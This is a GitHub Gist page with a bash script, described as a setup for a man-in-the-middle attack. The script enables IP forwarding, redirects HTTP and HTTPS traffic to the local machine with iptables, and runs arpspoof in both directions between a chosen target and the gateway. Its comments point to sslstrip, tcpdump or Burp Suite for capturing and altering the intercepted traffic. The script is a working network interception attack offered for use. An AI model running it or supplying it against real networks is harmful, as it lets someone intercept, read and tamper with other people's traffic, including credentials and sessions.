Last active
October 8, 2018 16:09
-
-
Save chamalis/4edae507ea948a97dd0bf61f389951d7 to your computer and use it in GitHub Desktop.
Bash script to set up MiTM attack using arpspoof
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # This script only sets up the interception mechanism, placing your machine | |
| # in the middle of target and gateway. | |
| # In order to actually capture and view/edit the traffic either run | |
| # sslstrip to bypass SSL and tcpdump to capture packets, or | |
| # Burp Suite (auto-generates certificates), or any other similar tool(s) | |
| if [ "$#" -ne 1 ]; then | |
| echo "Usage: bash mitm_https.sh targetIP" | |
| fi | |
| function handle_proc { | |
| # Storing the background process' PID. | |
| bg_pid=$! | |
| # Trapping SIGINTs/SIGTERMs so we can send them back to $bg_pid. | |
| trap "kill -15 $bg_pid" 2 15 | |
| # In the meantime, wait for $bg_pid to end. | |
| # wait $bg_pid | |
| } | |
| # fetch IPs | |
| trgt=$1 | |
| me=$(ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d'/') | |
| gw=$(/sbin/ip route | awk '/default/ { print $3 }') | |
| # enable forwarding | |
| echo 1 > /proc/sys/net/ipv4/ip_forward | |
| # rules to allow forwarding | |
| iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination ${me} | |
| iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination ${me} | |
| # make gw, target communicate through me | |
| cmd1="arpspoof -t ${gw} ${trgt}" | |
| nohup $cmd1 & | |
| handle_proc | |
| cmd2="arpspoof -t ${trgt} ${gw}" | |
| nohup $cmd2 & | |
| handle_proc | |
| wait $bg_pid |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment